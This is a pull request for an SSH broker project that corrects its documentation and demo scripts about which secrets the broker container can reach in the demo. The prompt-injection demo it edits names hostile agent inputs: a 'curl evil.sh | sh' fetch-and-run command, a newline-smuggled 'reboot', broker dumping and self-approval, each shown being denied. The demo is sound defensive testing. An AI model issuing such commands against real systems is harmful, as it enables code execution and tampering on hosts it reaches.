### PR TITLE
docs(demo): stop claiming broker has nothing to steal

### DIFF
--- a/docs/CHANGELOG.md
+++ b/docs/CHANGELOG.md
@@ -45,6 +45,10 @@
   deploy skill no longer requires an empty `callers._default` (obsolete after
   v2.0.0) and documents the `agent` (ssh-agent/HSM) CA backend alongside
   `akv` and `pem`.
+- **Demo docs: stop claiming "nothing to steal" on a shared volume (#359)** —
+  `broker.json` has no `ca_key` (process isolation), but the compose volume
+  still exposes `pki/ssh_ca` to uid 65532. CONTAINERS, compose, pki-init, and
+  the prompt-injection demo now say so and name agent/AKV for production.
 
 ## [v3.1.0] - 2026-08-03
 

--- a/docs/CONTAINERS.md
+++ b/docs/CONTAINERS.md
@@ -126,7 +126,10 @@ allowlist plus a `require_approval` rule, and the broker points at the bundled
 **control plane** (not the signer directly). A deterministic, scripted
 **prompt-injection live-fire** drives both — `curl evil.sh | sh` (denied,
 shell_parse splits the pipe), newline smuggling (denied), "dump the broker"
-(distroless, no CA key — nothing to steal), and self-approval (denied,
+(distroless has no shell; `broker.json` has no `ca_key` so the process does
+not load the CA — the teaching point is process isolation, not volume
+isolation: the shared demo volume still holds `pki/ssh_ca` readable by the
+broker uid; see Demo ≠ production below), and self-approval (denied,
 four-eyes) — each ending in the control that stops it:
 
 ```bash
@@ -167,11 +170,14 @@ privileged ports on the host.
 
 !!! warning "Demo ≠ production"
     The demo trades away everything the hardened deployment is about: all
-    material lives in one volume, services share it, TTLs and cert lifetimes
-    are short but the PKI is self-signed and disposable. Production runs each
-    service as its own system user via `deploy/install.sh` (systemd), with
-    per-service PKI directories and optionally the CA key in Azure Key Vault —
-    see [Operations](OPERATIONS.md) and the
+    material lives in one volume (including the SSH CA private key under
+    `pki/ssh_ca`, owned by the shared nonroot uid — so a broker process that
+    never *loads* the CA can still *read the file*), services share that
+    volume, TTLs and cert lifetimes are short but the PKI is self-signed and
+    disposable. Production runs each service as its own system user via
+    `deploy/install.sh` (systemd), with per-service PKI directories and the CA
+    key in Azure Key Vault, ssh-agent/HSM, or other KMS — not shared-volume
+    PEM — see [Operations](OPERATIONS.md) and the
     [deploy README](https://github.com/luisgf/infrabroker/tree/main/deploy).
 
 !!! note "Kubernetes: target vs runtime"

--- a/examples/compose/compose.yaml
+++ b/examples/compose/compose.yaml
@@ -67,8 +67,9 @@ services:
       timeout: 2s
       retries: 15
 
-  # HTTP+mTLS frontend (POST /v1/ssh_run). Runs WITHOUT the CA key: it asks
-  # the signer for a scoped ephemeral certificate per operation.
+  # HTTP+mTLS frontend (POST /v1/ssh_run). Config has no ca_key: it asks the
+  # signer for a scoped ephemeral certificate per operation. (Demo-only: the
+  # shared volume still holds pki/ssh_ca as uid 65532 — not production isolation.)
   broker:
     image: ghcr.io/luisgf/infrabroker:${INFRABROKER_TAG:-latest}
     entrypoint: ["/usr/local/bin/broker", "-config", "/demo/broker.json"]

--- a/examples/compose/pki-init/pki-init.sh
+++ b/examples/compose/pki-init/pki-init.sh
@@ -213,6 +213,10 @@ cat > "$DEMO/control-plane.json" <<EOF
 EOF
 
 echo "== 4. ownership: 65532 (distroless nonroot) except sshd material =="
+# Demo-only shared volume: broker/signer/control-plane all run as 65532 and
+# can therefore read pki/ssh_ca. That is intentional teaching material (see
+# docs/CONTAINERS.md Demo≠production), NOT production isolation — production
+# uses per-service users and pki/<svc>/ via deploy/install.sh.
 chown -R 65532:65532 "$DEMO/pki" "$DEMO/state" \
     "$DEMO/signer.json" "$DEMO/broker.json" "$DEMO/mcp.json" "$DEMO/control-plane.json"
 chmod 600 "$P"/*.key "$P/ssh_ca" "$DEMO/state/"*.seed

--- a/examples/compose/prompt-injection-demo.sh
+++ b/examples/compose/prompt-injection-demo.sh
@@ -5,7 +5,8 @@
 #
 #   1. curl evil.sh | sh  — shell_parse splits the pipe; `sh` fails the allowlist.
 #   2. newline smuggling  — the signer rejects control characters in the command.
-#   3. dump the broker    — distroless (no shell) and no CA key; nothing to steal.
+#   3. dump the broker    — distroless (no shell); broker.json has no ca_key
+#                           (process isolation). Shared-volume CA is a demo gap.
 #   4. self-approval      — the requester cannot approve its own gated command.
 #
 # It brings up examples/compose (signer + control-plane + broker + sshd), runs
@@ -69,7 +70,7 @@ code=$(ssh_run '{"host":"demo","command":"uptime\nreboot"}')
   || bad "expected 400/403, got $code: $(body)"
 
 echo
-echo "== 3. dump the broker — nothing to exfiltrate =="
+echo "== 3. dump the broker — process isolation (not volume isolation) =="
 if "${COMPOSE[@]}" exec -T broker sh -c 'echo x' >/dev/null 2>&1; then
   bad "the broker container has a shell (expected distroless, none)"
 else
@@ -78,7 +79,7 @@ fi
 if "${COMPOSE[@]}" exec -T sshd grep -q '"ca_key"' /demo/broker.json 2>/dev/null; then
   bad "broker.json contains a ca_key"
 else
-  ok "broker.json has no ca_key — the CA lives only in the signer; the broker's per-op key is ephemeral and discarded"
+  ok "broker.json has no ca_key — the process does not load the CA (signer mints per-op certs); demo volume isolation is intentionally weaker — see CONTAINERS Demo≠production"
 fi
 
 echo


### PR DESCRIPTION
## Summary
- Demo docs overclaimed "nothing to steal" / no CA on the broker.
- Config is remote-mode (no `ca_key`); the shared volume still holds `pki/ssh_ca` as uid 65532.
- CONTAINERS, compose, pki-init, and prompt-injection demo now state process vs volume isolation and production custody options.

Closes #359

## Test plan
- [x] Manual review of demo ownership layout vs docs